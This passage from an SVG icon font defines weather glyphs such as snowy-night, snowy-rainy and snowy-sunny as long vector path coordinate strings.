26 43 42 7 12-3 27-17 28z m-348 88v-13l-12 12-9-8 21-21v-22c2 1 3 1 6 1s3 0 5-1v22l21 21-9 8-12-12v13l-11 0z m11-106c-2-1-4-1-6-1-2 0-4 0-6 1v-22l-20-21 8-8 13 12v-13h11v13l12-12 9 8-21 21v22z m-33 21c0 2 0 4 0 6 0 2 0 4 0 6h-22l-20 20-8-8 12-12h-13v-12h13l-12-12 8-8 20 20h22z m-40 37l28 0 16-16c2 3 5 6 8 8l-16 16 0 29-11-1 0-17-10 9-8-8 9-9-17 0 1-11z m44-46l-16-15-28 0 0-12 17 0-10-9 9-8 9 9 0-17 11-1 1 29 15 16c-3 2-6 5-8 8z m102 33l-8 8-21-20h-22c1-2 1-4 1-6 0-2 0-4-1-6h22l21-20 8 8-12 12h13v12h-13l12 12z m-47 50l0-29-16-15c3-3 6-5 8-9l16 16 29 0 0 11-17 1 9 9-8 8-9-9 0 17-12 0z m37-98l-29 0-15 15c-3-3-5-6-9-8l16-16 0-28 12 0 0 17 9-9 8 8-9 9 17 0v12z m-69 51c-11 0-21-9-21-21 0-12 10-21 21-21s22 9 22 21c0 12-10 21-22 21z m116-100v4h-4v-4l-4 4-3-3 7-7v-7c1 0 1 0 2 0s1 0 2 0v7l7 7-3 3-4-4z m0-32c-1 0-1 0-2 0s-1 0-2 0v-7l-7-7 3-3 4 4v-4h4v4l4-4 3 3-7 7 0 7z m-11 7c0 1 0 2 0 2s0 2 0 2h-8l-6 7-3-3 4-4h-5v-4h5l-4-4 3-2 6 6 8 0z m-14 13h10l5-6c1 2 2 3 3 3l-5 5-1 10h-3v-6l-4 4-2-3 3-3h-6l0-4z m15-16l-5-5h-10v-4h6l-3-3 3-3 3 3v-5h4l0 9 5 5c-1 1-2 2-3 3z m35 11l-3 3-7-7h-7c0 0 0-1 0-2s0-1 0-2h7l7-7 3 3-4 4h4v4h-4l4 4z m-16 17l0-9-6-6c2 0 3-1 3-2l6 5h9v4h-6l4 3-3 3-3-4v6h-4z m12-33h-9l-6 5c0-1-1-2-2-3l5-5 0-9h4v5l3-3 3 3-3 3h5l0 4z m-16 10c0-4-3-7-7-7-4 0-7 3-7 7s3 8 7 8c4-1 7-4 7-8z m-13 100v-2l-2 2-2-2 4-3v-4c0 0 0 0 1 0 0 0 0 0 1 0v4l3 3-1 2-2-2v2h-2z m0-26v-2h2v2l2-2 1 2-3 3v4c-1 0-1 0-1 0s-1 0-1 0v-4l-4-3 2-2 2 2z m-13 11h2l-2-2 2-2 3 4h4c0 0 0 1 0 1s0 1 0 1h-4l-4 4-1-2 2-2h-2v-2h0z m2 6h5l3-2c0 0 1 1 1 1l-3 3v5h-2v-3l-1 2-2-2 2-2h-3v-2z m6-17v5l3 3c-1 0-1 1-1 1l-3-2h-5v-2h3l-2-2 1-2 2 2v-3h2z m18 17l-4-4h-3c0 0 0-1 0-1s0-1 0-1h3l4-4 2 2-3 2h3v2h-3l3 2-2 2z m-7 7v-5l-3-3c1 0 1-1 2-1l3 2h5v2h-3l2 2-2 2-2-2v3h-2z m7-17h-5l-3 2c0 0-1-1-2-1l3-3v-5h2v3l2-2 1 2-1 2h3v2z m-9 5c0-2-1-4-3-4s-4 2-4 4c0 2 1 4 4 4s3-2 3-4z" />
<glyph glyph-name="snowy-night" horiz-adv-x="1000" unicode="&#xee72;" d="M821 423c-45 44-99 57-159 35-12-4-16-5-21 8-39 98-130 152-234 140-95-11-169-86-187-187-1-7 0-14-7-17-17-7-30-18-41-30l0 1s-80-76-2-162c2-3 4-5 7-7 0-1 0-1 1-2l0 1c19-18 43-29 72-32 31-3 61 0 92-1l262 0c40 0 76-1 112 1 64 2 110 32 136 91 24 55 12 119-31 161z m-248 304c-26-21-41-49-43-82-1-13 0-25 3-37 41-17 76-47 101-88 4 0 9-1 13-1 70 1 114 60 115 108-17-21-38-32-63-35-25-2-48 5-67 22-17 14-26 32-30 53-5 32 6 60 29 84-22-2-41-11-58-24z m-38 21c1 0 2-1 2-2l3-13c1-4 5-5 7-2l9 10c1 1 2 2 3 1l14-1c3 0 5 4 3 6l-7 12c0 1-1 2 0 3l5 13c1 3-1 6-4 5l-13-3c-2-1-3 0-4 1l-10 8c-2 3-6 1-7-2l0-14c-1-1-1-2-2-3l-12-6c-3-2-2-6 1-8l12-5z m219-103l13-5c1 0 2-1 2-3l3-13c1-3 5-4 7-1l9 10c0 1 2 2 3 1l13-1c4 0 6 3 4 6l-7 12c-1 1-1 2 0 3l5 12c1 4-2 7-5 6l-13-3c-1-1-2 0-3 1l-10 8c-3 3-7 1-7-2l-1-14c0-1-1-2-2-3l-11-7c-3-1-3-6 0-7z m-93 51l-1-8c0-1 0-2-1-2l-8-5c-2-1-2-4 0-5l9-3c0 0 1-1 1-2l2-8c1-3 3-3 5-2l5 7c1 1 2 1 3 1l9-1c2 0 3 3 2 4l-5 8c0 1 0 2 0 2l4 8c0 2-1 5-4 4l-8-2c-1 0-2 0-3 0l-6 6c-2 2-4 1-4-2z m83 5c1 0 1-1 1-1l2-6c0-2 2-2 3-1l3 5c1 0 1 0 2 0l6 0c1 0 2 1 2 2l-3 6c-1 0-1 1-1 1l3 6c0 1-1 3-2 2l-6-1c-1-1-1 0-2 0l-4 4c-1 1-3 0-3-1l-1-6c0-1 0-1-1-2l-5-3c-1-1-1-2 0-3l6-2z m-104 60c0 0 1-1 1-1l2-8c0-1 2-2 4-1l4 6c1 1 2 1 2 1l8-1c1 0 3 2 2 4l-4 6c0 1-1 1 0 2l3 7c0 2-1 3-3 3l-7-2c-1 0-2 0-2 1l-6 5c-1 1-3 0-4-2l0-7c0-1 0-2-1-2l-6-4c-2-1-2-3 0-4l7-3z m-123-56c0 0 1 0 1-1l1-5c0-1 2-1 3 0l3 4c0 0 1 0 1 0l5 0c1 0 2 1 2 2l-3 5c0 0 0 1 0 1l2 5c0 1-1 2-2 2l-5-1c0-1-1 0-1 0l-4 3c-1 1-2 1-3-1l0-5c0 0 0-1-1-1l-4-3c-1 0-1-2 0-2l5-3z m59-608v-6l-6 6-4-4 10-10v-10c0 1 1 1 2 1s2 0 3-1v10l9 10-4 4-5-6v6h-5z m5-49c-1 0-2 0-3 0s-2 0-2 0v-10l-10-9 4-4 6 6v-6h5v6l5-6 4 4-9 9 0 10z m-15 10c0 1 0 2 0 3 0 1 0 2 0 3h-10l-10 9-3-4 5-5h-6v-6h6l-5-5 3-4 10 9h10z m-19 17l13 0 8-7c1 1 2 3 3 4l-7 7 0 13h-5v-8l-4 4-4-4 4-4h-8l0-5z m12-45h5l0 13 7 7c-1 1-2 3-3 4l-8-7-13 0v-5h8l-4-4 4-4 4 4 0-8z m55 39l-4 4-9-9h-10c0-1 0-2 0-3 0-1 0-2 0-3h10l9-9 4 4-5 5h6v6h-6l5 5z m-21 23l0-13-8-7c2-1 3-3 4-4l7 7 14 0v5h-8l4 4-4 4-4-4v8l-5 0z m17-45l-14 0-7 7c-1-1-2-3-4-4l8-7 0-13h5v8l4-4 4 3-4 5h8l0 5z m-32 24c-5 0-9-5-9-10 0-5 4-10 9-10s10 5 10 10c0 5-4 10-10 10z m-219 80v-14l-13 13-8-9 21-21v-23c2 1 4 1 6 1s4 0 6-1v23l21 21-9 9-12-13v14h-12z m12-110c-2 0-4 0-6 0s-4 0-6 0v-22l-21-21 8-9 13 13v-14h12v14l12-13 8 9-20 21 0 22z m-34 23c-1 2-1 4-1 6s0 4 1 6h-23l-21 21-8-9 12-12h-13v-12h13l-12-13 8-8 21 21 23 0z m-42 37l30 0 16-16c2 3 5 6 8 9l-16 15 0 30-12 0 0-18-9 10-9-9 9-9-17 0v-12z m46-47l-17-16-29 0 0-12 17 0-9-9 8-9 10 10 0-18 12 0 0 30 16 15c-3 3-6 6-8 9z m104 34l-8 9-21-21h-23c1-2 1-4 1-6 0-2 0-4-1-6h23l21-21 8 8-12 13h13v12h-13l12 12z m-48 51l0-29-16-16c3-3 6-6 8-9l16 16 30 0 0 12-17 0 9 9-9 9-9-9 0 17h-12z m38-101l-29 0-17 16c-2-3-5-6-8-8l16-16 0-30 12 0 0 18 10-10 8 9-9 9 17 1 0 11z m-70 53c-12 0-22-9-22-21 0-12 10-22 22-22 12 0 21 10 21 22s-9 21-21 21z m119-103v4h-5v-4l-4 4-3-3 7-7v-8c1 1 2 1 2 1s2 0 2-1v8l8 7-3 3-4-4z m0-33c-1 0-2 0-2 0s-2 0-2 0v-7l-8-8 3-2 5 4v-5h4v5l4-4 3 2-7 8 0 7z m-12 8c0 1 0 1 0 2s0 1 0 2h-8l-7 7-3-3 4-4h-4v-4h4l-4-4 3-3 7 7 8 0z m-14 13l10 0 5-6c1 1 2 2 3 3l-5 6 0 10h-4v-6l-4 3-2-3 3-3h-6v-4z m15-16l-5-6-10 0v-4h6l-4-3 3-3 3 3v-6h5l0 11 5 5c-1 1-2 2-3 3z m36 11l-3 3-7-7h-8c0-1 1-1 1-2s-1-1-1-2h8l7-7 3 3-4 4h4v4h-4l4 4z m-16 17l-1-10-5-5c1-1 2-2 3-3l5 5 10 0v4h-5l3 4-3 2-3-3v6h-4z m12-34l-10 0-5 6c-1-1-2-3-3-3l5-6 1-10h4v6l3-3 3 3-3 3h5v4z m-23 18c-5 0-8-3-8-7s3-8 8-8 7 4 7 8c0 4-3 7-7 7z m205 143v-5l-4 4-3-3 7-7v-8c1 0 1 1 2 1s1-1 2-1v8l7 7-3 3-4-4v5h-4v0z m4-38c-1 0-1 0-2 0-1 0-1 0-2 0v-8l-7-7 3-3 4 4v-5h4v5l4-4 3 3-7 7v8z m-12 8c0 0 0 1 0 2 0 0 0 1 0 2h-8l-7 7-3-3 4-4h-4v-4h4l-4-5 3-3 7 8h8z m-14 12l10 1 6-6c0 1 1 2 3 3l-6 6 0 10h-4v-6l-4 3-3-3 4-3h-6l0-5z m16-16l-6-5-10 0v-4h6l-4-4 3-3 4 4v-6h4l0 10 6 5c-2 1-3 2-3 3z m36 12l-3 3-7-7h-8c0-1 0-2 0-2 0-1 0-2 0-2h8l7-8 3 3-4 5h4v4h-4l4 4z m-17 18l0-10-5-6c1-1 2-2 3-3l5 6 10-1v5h-6l4 3-3 3-4-3v6l-4 0z m13-35l-10 0-5 5c-1-1-2-2-3-3l5-5 0-11h4v6l4-3 3 3-4 3h6l0 5z m-17 11c0-5-3-8-7-8s-8 3-8 8 4 7 8 7 7-3 7-7z m-119-135v-3l-3 3-2-2 5-6v-5c0 0 1 0 1 0s1 0 2 0v5l5 6-2 2-3-3v3h-3z m3-27c-1 0-1 0-2 0s-1 0-1 0v-5l-6-5 3-2 3 3v-4h2v4l3-3 3 2-6 5 1 5z m-9 6c0 0 0 1 0 1s0 1 0 2h-5l-5 5-2-2 3-3h-4v-3h4l-3-3 2-2 5 5 5 0z m-10 9h7l4-4c1 1 2 2 2 2l-3 4v7h-3v-4l-3 2-2-2 3-2h-5v-3z m11-11l-4-4h-7v-3h5l-3-2 2-3 3 3v-5h3v8l3 3c0 1-1 2-2 3z m26 8l-2 2-5-5h-6c0-1 0-1 0-2s0-1 0-1h6l5-5 2 2-3 3h3v3h-3l3 3z m-7 10l-2-2v4h-3v-7l-4-4c1 0 2-1 2-2l4 4h7v3h-4l2 2-2 2z m4-22h-7l-4 3c0 0-1-1-2-2l4-3v-8h3v5l2-3 2 2-2 3h4v3z m-12 7c0-3-2-5-5-5s-5 2-5 5c0 3 2 5 5 5 3 1 5-2 5-5z m-108 135v-2l-2 2-2-1 4-4v-4c0 0 1 0 1 0 0 0 1 0 1 0v4l4 4-2 1-2-2v2h-2z m0-26v-2h2v2l2-2 2 1-4 4v4c0 0-1 0-1 0 0 0-1 0-1 0v-4l-4-4 2-1 2 2z m-13 11h2l-2-2 1-2 4 4h4c0 0 0 1 0 1s0 1 0 1h-4l-4 4-1-2 2-2h-2v-2z m2 7h5l3-3c0 0 1 1 1 1l-3 3v5h-2v-3l-1 2-2-2 2-1h-3l0-2z m6-18v5l3 3c0 0-1 1-1 1l-3-2h-5v-3h3l-2-1 1-2 2 2v-3l2 0z m19 17l-4-4h-4c0 0 0-1 0-1s0-1 0-1h4l4-4 1 2-2 2h2v2h-2l2 2-1 2z m-7 7v-5l-3-3c0 0 1-1 1-1l3 3h5v2h-3l2 1-1 2-2-2v3h-2z m6-17h-5l-3 2c0 0-1-1-1-1l2-3v-5h3v3l1-2 2 2-2 1h3l0 3z m-8 5c0-2-2-4-4-4s-4 2-4 4c0 2 2 4 4 4s4-2 4-4z" />
<glyph glyph-name="snowy-rainy" horiz-adv-x="1000" unicode="&#xee73;" d="M886 564c-55 53-120 68-192 42-13-5-19-5-25 10-47 117-157 182-281 167-114-13-203-103-224-224-1-8 0-17-9-21-20-8-36-20-49-35l0 0s-96-90-3-194c3-3 6-6 8-9 1 0 1-1 2-1l0 0c22-22 51-35 87-38 36-3 73 0 110-1l315 0c48 0 92-1 135 1 76 2 132 39 163 109 29 66 14 144-37 194z m-315-527c-9 4-16 0-23-7-26-25-52-51-78-77-9-10-16-21-4-32 12-11 23-6 33 4 25 25 50 50 75 75 5 5 9 10 9 17 1 10-3 16-12 20z m14 137c-34-34-68-69-102-103-8-7-8-17-4-26 5-9 12-14 26-14 4 0 9 3 14 7 33 34 67 67 100 101 10 10 10 23 0 34-11 10-23 11-34 1z m128-51c-2-1-5-1-7-2-24-15-43-35-59-59-5-8 0-18 7-25 8-7 18-9 26-4 21 16 40 33 54 55 10 14-4 35-21 35z m-447 113v-17l-15 16-11-11 26-26v-28c2 0 5 1 7 1 3 0 6-1 8-1v28l26 26-11 11-15-16v17h-15z m15-136c-2-1-5-1-8-1-2 0-5 0-7 1v-28l-26-26 11-11 15 15v-16h15v16l15-15 11 11-26 26v28z m-42 27c-1 3-1 5-1 8 0 3 0 5 1 7h-29l-26 26-10-10 15-16h-16v-15h16l-15-15 10-11 26 27 29-1z m-53 47l37 0 20-20c3 5 7 8 11 11l-20 20 0 37-15 0 0-22-12 11-11-10 12-12-22 0v-15z m57-58l-20-20-36 0-1-15 22 0-12-12 11-10 12 11 0-22 15 0 0 37 20 20c-4 3-8 7-11 11z m131 42l-10 11-26-26h-29c1-3 1-5 1-8 0-3 0-5-1-7h29l26-27 10 11-15 16h16v15h-16l15 15z m-60 64l0-37-20-20c4-3 8-7 10-11l20 20 37 0 0 15-21 0 11 12-10 10-12-11 0 21-15 1z m47-126l-36 0-21 20c-2-5-6-8-10-11l20-20 0-37 15 0 0 22 12-11 10 10-11 12 21 0 0 15z m-88 66c-15 0-27-12-27-27s12-27 27-27 28 12 28 27c0 15-13 27-28 27z m149-129v6h-5v-6l-6 5-3-3 9-9v-10c0 1 1 1 2 1 1 0 2 0 3-1v10l9 9-4 3-5-5z m0-41c-1 0-2 0-3 0s-1 0-2 0v-9l-9-9 3-4 6 6v-6h5v6l5-6 4 4-9 9 0 9z m-15 10c0 1 0 2 0 2 0 1 0 2 0 3h-9l-9 9-4-4 6-5h-6v-5h6l-6-5 4-4 9 9h9z m-17 16l12 0 7-7c1 1 2 3 4 4l-7 6 0 13h-5v-8l-4 4-4-3 4-4h-7l0-5z m19-20l-7-7-12 0v-5h7l-4-4 4-4 4 4v-7h5l0 13 7 6c-2 1-3 2-4 4z m44 14l-3 4-9-9h-10c1-1 1-2 1-3 0 0 0-1-1-2h10l9-9 3 4-5 5h6v5h-6l5 5z m-20 22l0-13-7-6c2-1 3-3 4-4l7 7 12 0v5h-7l4 4-4 3-4-4v8l-5 0z m16-43l-12 0-7 7c-1-2-2-3-4-4l7-7 0-12h5v7l4-4 4 4-4 4h7l0 5z m-30 23c-5 0-9-4-9-10s4-9 9-9 9 4 9 9-4 10-9 10z m-8 118v-3l-3 3-2-2 5-5v-5c0 0 1 0 1 0 1 0 1 0 2 0v5l4 5-2 2-2-3v3h-3z m0-33v-3h3v3l2-2 2 2-4 4v5c-1 0-1 0-2 0 0 0-1 0-1 0v-5l-5-4 2-2 3 2z m-17 14h3l-2-3 2-2 4 5h5c0 0 0 1 0 1 0 1 0 1 0 2h-5l-4 4-2-2 2-2h-3v-3z m3 8h6l4-3c1 0 1 1 2 2l-4 3v7h-2v-4l-2 2-2-2 2-2h-4l0-3z m8-22v6l4 4c-1 0-2 1-2 2l-4-4h-6v-2h4l-2-2 2-2 2 2v-4l2 0z m23 21l-4-4h-5c0-1 0-1 0-2 0 0 0-1 0-1h5l4-5 2 2-3 3h3v3h-3l3 2-2 2z m-9 10v-7l-3-3c1-1 1-2 2-2l3 3h7v3h-4l2 2-2 2-2-2v4h-3z m9-23h-7l-3 4c-1-1-1-2-2-2l3-4v-6h3v4l2-2 2 2-2 2h4l0 2z m-11 7c0-2-2-5-5-5s-4 3-4 5c0 3 2 5 4 5s5-2 5-5z" />
<glyph glyph-name="snowy-sunny-hail" horiz-adv-x="1000" unicode="&#xee74;" d="M816 434c-44 43-97 56-157 34-11-4-15-4-20 8-39 96-128 149-230 137-94-10-167-84-184-184-1-6 0-13-8-16-16-7-29-17-40-29l0 0s-78-74-2-159c2-3 5-5 7-8 0 0 0 0 1-1l0 1c18-18 42-29 71-32 30-2 60 0 90-1l259 1c39 0 75-1 110 0 63 2 108 32 134 90 24 54 12 118-31 159z m-372 211c-2-4-4-9-6-13 74 2 140-31 182-89 2 3 4 7 6 10 25 50 5 111-45 137-51 25-112 5-137-45z m207-36c-1-6 3-13 8-16 2-1 4-1 7-1 15 0 30 1 45 2 8 1 13 8 13 15 0 8-6 14-14 14-16 0-31-1-47-3-6 0-11-5-12-11z m-62 91c7-4 16-1 20 7l9 19 10 19 0 0c4 8 1 16-6 20-8 4-16 1-20-7-7-12-13-25-19-38-4-8-1-16 6-20z m-217-36l20-10 19-9c7-4 15-2 19 5 4 7 2 16-5 20-14 7-27 14-41 20-7 4-16 0-19-7-3-7 0-15 7-19z m286-111c-7 4-16 0-19-7-4-7-1-15 7-19l19-10 19-9c8-4 16-2 20 5 4 7 1 16-6 20-13 7-26 14-40 20z m-20 101c4-2 9-2 13 1 13 8 26 16 39 25 6 4 7 13 3 19-4 7-13 9-19 5-13-8-26-16-39-25-8-6-7-20 3-25z m-118 63c11-5 22 2 21 13 0 15-1 29-2 44-1 8-7 14-16 13-8 0-14-7-13-15 0-14 1-29 2-43 1-6 3-10 8-12z m-70-17c1-2 3-4 5-5 7-3 14-2 18 3 5 5 5 12 2 18-8 12-16 24-24 36-5 7-14 9-21 5-7-5-8-13-4-21 8-12 16-24 24-36z m50-758c0-16-13-30-29-30s-30 14-30 30 14 29 30 29 29-13 29-29z m-20 95c0-8-6-15-15-15s-14 7-14 15 6 15 14 15 15-7 15-15z m233 29c0-16-14-29-30-29s-29 13-29 29 13 30 29 30 30-13 30-30z m-166 35v-6l-6 5-4-4 10-9v-10c1 0 2 0 2 0 1 0 2 0 3 0v10l10 9-4 4-6-5v6h-5z m5-50c-1 0-2 0-3 0 0 0-1 0-2 0v-10l-10-10 4-4 6 6v-6h5v6l6-6 4 4-10 10 0 10z m-15 10c-1 1-1 2-1 3 0 1 0 2 1 2h-11l-9 10-4-4 6-5h-6v-6h6l-6-6 4-3 9 9 11 0z m-19 17l13 0 7-7c1 1 3 3 4 4l-7 7 0 13h-6v-8l-4 5-4-4 5-4h-8l0-6z m20-21l-7-7-13 0v-6h8l-5-4 4-4 4 4v-8h6l0 14 7 7c-1 1-3 2-4 4z m44 19l-9-9h-11c1-1 1-2 1-3 0-1 0-2-1-3h11l9-9 4 4-6 5h6v6h-6l6 5-4 4z m-18 19l0-13-7-7c1-1 3-3 4-4l7 7 13 0v6h-8l5 4-4 4-4-5v8l-6 0z m6-55l4-4 4 4-5 4h8v6l-13-1-7 8c-1-2-3-3-4-4l7-7 0-14h6l0 8z m-21 34c-5 0-9-5-9-10 0-6 4-10 9-10 6 0 10 4 10 10s-4 10-10 10z m-224 81v-13l-13 12-9-8 22-22v-23c2 1 4 1 6 1s4 0 6-1v23l21 22-9 8-12-12v13h-12z m12-111c-2 0-4-1-6-1s-4 1-6 1v-23l-21-22 8-8 13 12v-13h12v13l13-12 9 8-22 22 0 23z m-35 23c0 2 0 4 0 6 0 2 0 4 0 6h-23l-21 21-9-9 13-12h-14v-13h14l-13-12 9-9 21 21h23z m-42 38l30 0 16-17c3 4 6 7 9 9l-16 17-1 30-12 0 0-18-9 9-9-8 10-10-18 0 0-12z m46-48l-16-16-30 0 0-13 17 0-9-9 8-9 10 10 0-18 12 0 0 30 17 16c-3 2-6 5-9 9z m107 34l-8 9-22-21h-23c1-2 1-4 1-6 0-2 0-4-1-6h23l22-22 8 9-12 13h13v12h-13l12 12z m-49 53l0-30-16-17c3-2 6-5 8-9l17 17 30 0 0 12-18 0 10 10-9 8-9-9 0 18-13 0z m39-103l-30 0-17 16c-2-4-5-7-8-9l16-16 0-30 12 0 0 18 10-10 9 9-10 9 18 0v13z m-72 54c-12 0-22-10-22-22s10-23 22-23 22 10 22 23c0 12-10 22-22 22z m249-91v-2l-2 2-2-1 4-4v-4c1 0 1 0 1 0 1 0 1 0 1 0v4l4 4-2 1-2-2v2h-2z m3-19c-1-1-1-1-1-1-1 0-1 0-1 1v-5l-4-3 1-2 3 2v-2h2v2l2-2 2 2-4 3v5h0z m-7 4c0 0 0 0 0 1 0 0 0 0 0 1h-4l-4 3-1-1 2-3h-2v-2h2l-2-2 1-2 4 4 4 1z m-7 6h5l3-3c0 1 1 1 1 2l-2 3v5h-3v-3l-1 2-2-2 2-2h-3v-2z m8-8l-3-3h-5v-2h3l-2-2 2-2 1 2v-3h3v5l3 3c-1 1-2 1-2 2z m19 6l-2 2-3-4h-5c1-1 1-1 1-1 0-1 0-1-1-1h5l3-4 2 2-2 2h2v2h-2l2 2z m-9 9v-5l-3-3c1 0 1-1 2-2l3 3h5v2h-3l2 2-2 2-2-2v3h-2z m7-18h-5l-3 3c0-1-1-1-2-2l3-3v-5h2v3l2-2 2 2-2 2h3l0 2z m-9 6c0-3-1-4-4-4s-3 1-3 4 1 4 3 4c3 0 4-2 4-4z" />
<glyph glyph-name="snowy-sunny-rainy" horiz-adv-x="1000" unicode="&#xee75;" d="M812 438c-44 43-97 55-155 34-11-4-15-4-21 8-38 95-126 147-227 136-92-11-165-84-182-182-1-6 0-14-7-17-16-7-29-16-40-28l0 0s-77-73-1-157c2-3 4-5 6-7l1-2 0 1c18-18 42-29 71-31 29-3 59 0 89-1l255 0c39 0 74-1 109 0 62 2 107 32 132 89 24 54 12 116-30 157z m-254-427c-8 4-14 0-19-5-21-21-42-42-63-63-8-8-13-16-4-26 10-8 19-4 27 4 20 20 40 40 60 61 4 4 8 8 8 13 1 8-3 13-9 16z m11 111c-28-27-56-55-83-83-6-6-7-14-3-21 4-7 10-11 21-11 3-1 7 2 11 5 27 28 55 55 81 82 8 8 9 19 0 27-9 9-19 9-27 1z m103-41c-2-1-4-1-5-2-20-12-35-28-48-47-4-7 0-15 6-20 6-6 14-8 21-3 16 12 32 26 43 43 8 12-3 29-17 29z m-228 566c-2-4-4-9-5-13 73 2 138-30 179-88 2 3 4 6 6 10 25 50 5 110-45 135-50 25-110 5-135-44z m205-36c-1-6 2-12 7-15 2-1 5-2 7-2 15 1 30 2 45 3 7 0 13 7 12 15 0 7-6 14-13 13-16 0-31-1-47-2-6-1-10-6-11-12z m-62 90c7-3 16-1 20 7l9 19 9 18 1 1c3 8 1 16-6 19-8 4-16 1-20-6-6-13-13-25-19-38-4-8-1-16 6-20z m68-145c-7 4-15 0-18-7-4-7-1-15 6-19 7-3 13-6 20-9 6-4 12-7 19-10 7-3 15-1 19 6 4 7 2 16-6 19-13 7-26 14-40 20z m-284 111c6-3 13-6 19-9 7-3 13-7 19-10 8-3 16-1 19 6 4 7 2 16-5 19-13 7-26 14-40 20-7 4-16 0-19-6-3-8 0-16 7-20z m264-11c5-2 10-2 14 0 13 8 25 17 38 25 6 4 7 13 3 19-4 7-12 9-19 5-13-8-25-16-38-25-9-6-7-19 2-24z m-115 61c10-4 21 3 20 14 0 14-1 29-2 43-1 8-7 14-15 14-8-1-14-7-14-16 1-14 2-28 3-43 0-5 3-9 8-12z m-70-16c1-2 3-4 5-4 7-4 13-2 18 2 4 5 5 12 1 18-7 12-15 24-23 36-5 7-14 8-21 4-6-5-8-13-3-20 7-12 15-24 23-36z m-140-528v-14l-12 13-9-9 21-21v-23c2 0 4 1 6 1 3 0 5-1 6-1v23l22 21-9 8-13-12v13l-12 1z m12-111c-2 0-4 0-6 0s-4 0-6 0v-23l-21-21 9-8 12 12v-13h12v13l13-12 9 8-22 21v23z m-34 23c0 2-1 4-1 6 0 2 1 4 1 6h-23l-21 21-8-9 12-12h-13v-12h13l-12-13 8-9 21 22h23z m-42 37l30 0 16-16c2 4 5 7 9 9l-17 16 0 30-12 0 0-18-9 10-9-9 9-10-17 0 0-12z m46-47l-16-16-30 0 0-12 18 0-10-9 9-9 9 9 0-17 12 0 1 29 16 16c-4 3-7 6-9 9z m106 34l-9 9-21-21h-23c1-2 1-4 1-6s0-4-1-6h23l21-21 9 8-13 13h14v12h-14l13 12z m-49 52l0-30-16-16c3-2 6-5 8-9l17 16 29 0 1 12-18 0 9 10-8 9-10-10 0 18h-12z m38-102l-29 0-17 16c-2-3-5-6-8-9l16-16 0-30 12 1 0 17 10-9 8 8-9 10 18 0-1 12z m-71 54c-12 0-22-10-22-22 0-13 10-22 22-22 13 0 22 9 22 22 0 12-9 22-22 22z m120-105v5h-4v-5l-4 4-3-2 7-8v-8c1 1 2 1 3 1s1 0 2-1v8l7 8-3 2-5-4z m0-33c0 0-1 0-2 0s-1 0-2 0v-8l-7-7 3-3 4 5v-5h4v5l5-5 2 3-7 7 0 8z m-11 8c0 1 0 1 0 2 0 1 0 1 0 2h-8l-7 7-3-3 4-4h-4v-4h4l-4-4 3-3 7 7 8 0z m-15 13l11 0 5-6c1 1 2 2 3 3l-5 6-1 10h-4v-6l-3 3-3-3 3-3h-6v-4z m16-16l-5-6h-11v-4h6l-3-3 3-3 3 3v-6h4l1 10 5 6c-1 1-2 2-3 3z m36 11l-3 3-7-7h-8c0-1 0-1 0-2 0-1 0-2 0-2h8l7-7 3 2-4 5h4v4h-4l4 4z m-16 18l-1-10-5-6c1-1 2-2 3-3l5 6 11-1v5h-6l3 3-3 3-3-3v6l-4 0z m13-35h-11l-5 6c-1-1-2-2-3-3l5-6 1-10h4v6l3-3 3 3-3 3h6v4z m-17 11c0-4-3-8-8-8s-7 4-7 8 3 7 7 7c5 1 8-3 8-7z m-14 103v-2l-2 2-2-1 4-4v-4c0 0 1 0 1 0 0 0 1 0 1 0v4l4 4-2 1-2-2v2h-2z m0-26v-2h2v2l2-2 2 1-4 4v4c0 0-1 0-1 0s-1 0-1 0v-4l-4-4 1-1 3 2z m-14 11h3l-2-2 1-2 4 4h4c0 0 0 1 0 1s0 1 0 1h-4l-4 4-1-2 2-2h-3v-2z m2 6h6l3-2c0 0 0 1 1 1l-3 3v5h-2v-3l-2 2-1-2 1-1h-3l0-3z m7-17v5l3 3c-1 0-1 1-2 1l-2-3h-6v-2h3l-1-2 1-1 2 2v-4l2 1z m19 17l-4-4h-4c0 0 0-1 0-1s0-1 0-1h4l4-4 1 1-2 3h2v2h-2l2 2-1 2z m-7 7v-5l-3-3c0 0 1-1 1-1l3 3h5v2h-3l2 1-2 2-1-2v3l-2 0z m6-18h-5l-3 3c0 0-1-1-1-1l3-3v-5h2v3l1-2 2 2-2 1h3l0 2z m-8 6c0-2-2-4-4-4-2 0-4 2-4 4 0 2 2 4 4 4 2 0 4-2 4-4z" />
<glyph glyph-name="snowy-sunny" horiz-adv-x="1000" unicode="&#xee76;" d="M822 428c-46 44-100 57-160 35-11-4-16-5-21 8-39 98-130 152-234 140-95-11-169-86-187-188-1-6 0-13-7-17-17-7-30-17-41-29l0 0s-80-75-2-162c2-2 4-5 6-7 1 0 1-1 2-1l0 0c19-18 43-29 72-32 31-3 61 0 92-1l263 1c40 0 76-2 112 0 64 2 110 33 136 91 24 55 12 120-31 162z m-379 215c-3-5-4-9-6-13 75 2 142-32 185-91 2 3 4 7 6 10 25 51 5 113-46 139-51 26-114 6-139-45z m211-37c-2-6 2-13 7-16 2-1 5-2 7-2 16 1 31 2 46 3 8 1 14 8 13 15 0 8-6 15-14 14-16 0-31-1-47-2-7-1-11-6-12-12z m-64 93c8-4 16-1 20 7 4 6 7 13 10 19l9 19 1 1c3 7 1 16-7 20-7 3-16 1-20-7-6-13-13-26-19-39-4-8-1-17 6-20z m-220-37l20-10c6-3 13-7 19-10 8-3 16-1 20 6 4 7 2 16-6 20-13 8-27 14-41 21-7 3-16 0-19-7-4-8-1-16 7-20z m290-112c-7 3-16-1-19-8-3-7 0-15 7-19l20-10c6-3 13-7 19-10 8-4 16-1 20 6 4 7 2 16-6 20-13 7-27 14-41 21z m-20 102c4-2 9-2 14 1 13 8 26 16 39 25 6 4 7 13 3 20-4 6-13 9-19 5-14-9-27-17-40-26-8-6-7-20 3-25z m-119 63c10-5 21 3 21 14-1 15-2 30-3 45 0 8-7 14-15 13-9 0-15-7-14-15 1-15 2-30 2-44 1-6 3-10 9-13z m-72-16c1-3 3-4 5-5 7-3 14-2 18 3 5 5 6 12 2 17-8 13-16 25-24 38-5 7-14 9-21 4-7-5-9-13-4-21 8-12 16-24 24-36z m105-595v-6l-5 6-4-4 9-10v-10c1 0 2 0 3 0 1 0 2 0 3 0v10l10 10-4 4-6-6v6h-6z m6-50c-1-1-2-1-3-1-1 0-2 0-3 1v-11l-9-9 4-4 5 5v-6h6v6l6-5 4 4-10 9v11z m-16 10c0 1 0 2 0 3 0 1 0 2 0 3h-10l-10 9-4-4 6-5h-6v-6h6l-6-6 4-4 10 10h10z m-19 17l14 0 7-7c1 1 3 3 4 4l-7 7 0 14h-6v-8l-4 